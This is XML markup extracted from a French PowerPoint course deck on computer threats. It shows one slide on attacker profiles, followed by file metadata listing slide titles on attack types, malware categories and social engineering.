            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36044959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05753"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Profile des attaquants</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11543212" cy="5550598"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Plusieurs profiles d’attaquants, caractérisés par :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Leurs compétences techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le temps qu’ils sont prêts à passer pour réussir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Leurs motivations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Leurs moyens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Leurs connaissances préalables de la cible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6951A42B-171D-4B94-AECE-9A114FAB7514}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3491154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26518</TotalTime>
  <Words>5339</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>1151</Paragraphs>
  <Slides>74</Slides>
  <Notes>72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74</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>Adobe Arabic</vt:lpstr>
      <vt:lpstr>Adobe Heiti Std R</vt:lpstr>
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Thème Office</vt:lpstr>
      <vt:lpstr>Les menaces informatiques</vt:lpstr>
      <vt:lpstr>Plan du cours</vt:lpstr>
      <vt:lpstr>Plan du chapitre 3</vt:lpstr>
      <vt:lpstr>Les menaces</vt:lpstr>
      <vt:lpstr>Les menaces</vt:lpstr>
      <vt:lpstr>Les menaces</vt:lpstr>
      <vt:lpstr>Les attaques</vt:lpstr>
      <vt:lpstr>Les motivations / objectifs des attaques</vt:lpstr>
      <vt:lpstr>Profile des attaquants</vt:lpstr>
      <vt:lpstr>Profile des attaquants</vt:lpstr>
      <vt:lpstr>Surface des attaques</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Méthodologie d’une attaque (Phases principales)</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Les attaques actives</vt:lpstr>
      <vt:lpstr>Les attaques actives</vt:lpstr>
      <vt:lpstr>Les attaques actives</vt:lpstr>
      <vt:lpstr>Les attaques actives</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Classification des attaques</vt:lpstr>
      <vt:lpstr>Les malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Les types de malwares</vt:lpstr>
      <vt:lpstr>Exemples d’attaques</vt:lpstr>
      <vt:lpstr>Les attaques réseaux</vt:lpstr>
      <vt:lpstr>Attaques réseaux</vt:lpstr>
      <vt:lpstr>Attaques réseaux</vt:lpstr>
      <vt:lpstr>Les attaques réseaux</vt:lpstr>
      <vt:lpstr>Attaques réseaux</vt:lpstr>
      <vt:lpstr>Attaques réseaux</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Les attaques applicatives</vt:lpstr>
      <vt:lpstr>Les attaques applicatives</vt:lpstr>
      <vt:lpstr>Les attaques applicatives</vt:lpstr>
      <vt:lpstr>Les attaques applicatives</vt:lpstr>
      <vt:lpstr>Les attaques applicatives</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques par ingénierie</vt:lpstr>
      <vt:lpstr>Les attaques web</vt:lpstr>
      <vt:lpstr>Références</vt:lpstr>
      <vt:lpstr>Références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menaces informatiques</dc:title>
  <dc:creator>Abdou</dc:creator>
  <cp:lastModifiedBy>Abdou</cp:lastModifiedBy>
  <cp:revision>651</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-29T16:45:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-17T08:11:53Z</dcterms:modified>
</cp:coreProperties>
</file>